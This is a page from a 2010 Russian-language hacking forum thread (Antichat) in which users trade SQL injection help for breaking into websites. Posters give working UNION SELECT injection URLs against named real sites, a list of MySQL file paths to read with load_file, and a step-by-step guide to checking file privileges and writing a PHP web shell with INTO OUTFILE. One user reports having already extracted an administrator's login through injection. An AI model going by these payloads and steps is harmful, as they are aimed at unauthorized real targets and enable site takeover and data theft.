ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.09.2010, 00:34
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Redwood
Спасибо большое. Помогло. +
brutos
C:\WebServers\home\localhost\www
=)
|
|
|
25.09.2010, 01:29
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
Сообщение от auth_root
auth_root said:
C:\WebServers\home\localhost\www
Ага, смотрел. Ну там явно не Denwer
|
|
|
|
25.09.2010, 01:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
brutos попробуй те же пути на других дисках, например D:\
|
|
|
|
25.09.2010, 13:35
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
вот из такого что-то выжать можно?
http://partnervanjedromen.nl/search_result.php?Sex=Female%27&LookingFor=female& DateOfBirth_start=19&DateOfBirth_end=44
или подскажите где почитать инфу
|
|
|
|
25.09.2010, 14:51
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
http://partnervanjedromen.nl/search_result.php?Sex=Female') and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30--+&LookingFor=female&DateOfBirth_start=19&DateOfBir th_end=44
|
|
|
|
25.09.2010, 15:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от brutos
brutos said:
Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows.
Есть возможность читать файлы вот так:
id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696 e69),4+--+
где 0x633a5c626f6f742e696e69 - C:/boot.ini
Инклуд тоже не нашел, иначе бы в C:/ файл и залил.
Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти...
Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи?
Сталкиваюсь с таким в первый раз, потерялся))
пробуй варианты
C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
C:\Program Files\MySQL\data\hostname.err
C:\Program Files\MySQL\data\mysql.log
C:\Program Files\MySQL\data\mysql.err
C:\Program Files\MySQL\data\mysql-bin.log
C:\MySQL\data\hostname.err
C:\MySQL\data\mysql.log
C:\MySQL\data\mysql.err
C:\MySQL\data\mysql-bin.log
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\my.cnf
C:\MySQL\my.ini
C:\MySQL\my.cnf
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
25.09.2010, 15:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
8054
Репутация:
0
|
|
Как залить шелл в InstantCMS? Нигде не могу найти.
|
|
|
|
25.09.2010, 15:44
|
|
Участник форума
Регистрация: 18.01.2008
Сообщений: 158
Провел на форуме:
2441184
Репутация:
106
|
|
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).
|
|
|
|
25.09.2010, 15:49
|
|
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
Провел на форуме:
3767223
Репутация:
408
|
|
Сообщение от Vlad3d
Vlad3d said:
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).
Пункт 2.2
Проверить привилегии на запись можно вот так:
Сообщение от None
http://www.stylisdesigns.com/catalog.php?ID=-79+union+select+1,2,3,file_priv,5,6,7,8,9,0,1,2,3, 4,5+from+mysql.user+where+user=%27swdata%27--+
N - no = нет прав
Y - yes = есть права
|
|
|
|
25.09.2010, 16:09
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от Vlad3d
Vlad3d said:
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на заливку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).
Попробуй поискать инклюды в админке. Для заливки шелла через инжект Проверь эти пункты:
1. Экранирование ковычек он же magic_quotes_qpc. Эта шняга должна быть установлена на off в php.ini. Попробуй в любое поле вписать текст 'lol' и если запрос обработается успешно и выведет "lol", то по первому пункту проходит.
2. Права доступа к счеме mysql. Попробуй вывести что угодно, даже циферки из mysql.user. Пример : UNION SELECT 1,2,3 from mysql.user. Если запрос обработается также как и при UNION SELECT 1,2,3, то по этому пункту тоже проходит.
3. file_priv. Сперва узнаем через какого юзера мы подключены к бд. Для этого отправляем запрос UNION SELECT user(),2,3. Например нам вывело root@localhost. Теперь проверяем file_priv у нашего юзера - select file_priv,2,3 from mysql.user where user='root' (если magic_quotes_qpc=on, то root заменить на хекс - 0x726F6F74. Соответственно мы тогда не проходим по 1 пункту, но зато можем читать файлы через функцию load_file). Если выдало Y - у нашего юзера есть файл привелигии и мы проходим по этому пункту else не проходим
4. Путь. Мы должны знать полный путь от корня сервера. например: /home/www/site/
5. Возможность запись в папку. Если не пишется в /home/www/site/ можно попробовать записать в /home/www/site/images/ к примеру.
Собственно как лить :
union select 'наш пхп код',2,3 from mysql.user into outfile '/home/www/site/images/lol.php' . Если по всем вышеперечисленным пунктам все ок и вы сделали все правильно, то по адресу http://site/images/lol.php будет лежать наш файлиг. Если что-то непонятно пиши в пм - всегда рад помочь
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
